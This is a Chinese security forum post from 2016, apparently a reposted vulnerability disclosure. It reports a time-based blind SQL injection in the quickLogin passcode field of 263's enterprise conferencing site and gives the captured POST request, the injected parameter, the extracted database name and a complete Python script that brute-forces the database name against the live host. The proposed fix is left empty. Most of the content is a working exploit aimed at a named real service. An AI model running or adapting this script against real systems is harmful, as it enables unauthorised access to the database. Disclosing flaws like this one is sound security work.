HanDs
管理员

[7月漏洞公开] 263企业会议一处SQL盲注(附验证脚本) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

极其隐秘的一处注入。

详细说明:

263企业会议

http://cc.263.net/login

0.jpg





快速入会,抓包:

code 区域
POST http://cc.263.net/quickLogin HTTP/1.1
Host: cc.263.net

quickLoginName=wooyun&quickLoginPasscode=12345&clientloginType=11





注入参数:quickLoginPasscode



true:

b.jpg





false:

a.jpg





条件为true或者false,response一样。

不同的是,条件为true时,响应时间非常长:

1.jpg



条件为false,响应1秒;

条件为true,响应30秒以上。



根据条件不同,响应时间不同,盲注,跑出当前库名:

code 区域
BOSS3



2.jpg





快速加入会议功能,入会密码存在注入,可影响会议系统。

漏洞证明:

python验证脚本:

code 区域
#encoding=utf-8 
import httplib
import time
import string
import sys
import random
import urllib

headers = {'Content-Type': 'application/x-www-form-urlencoded'}

payloads = 'ABCDEFGHIJKLMNOPQRSTYVWXYZ0123456789@_.'

print '[%s] Start to retrive dbname:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
isEnd=False
for i in range(1, 36):
if isEnd:
break
isEnd=True
for payload in payloads:
url='/quickLogin'
start_time=time.time()
data='quickLoginName=lis&quickLoginPasscode=123456\' or MID(database(),'+str(i)+',1)=\''+payload+'&clientloginType=11'
conn = httplib.HTTPConnection('cc.263.net', timeout=60)
conn.request(method='POST',url=url,body=data, headers=headers)
html_doc = conn.getresponse().read()
conn.close()
print '.',
if(time.time()-start_time>20):
isEnd=False
user += payload
print '\n[in progress]', user,
break
time.sleep(0.01)
print '\n[Done] db dbname is %s' % user
time.sleep(20)

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
263 企业会议一处 SQL 盲注 附验证脚本
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复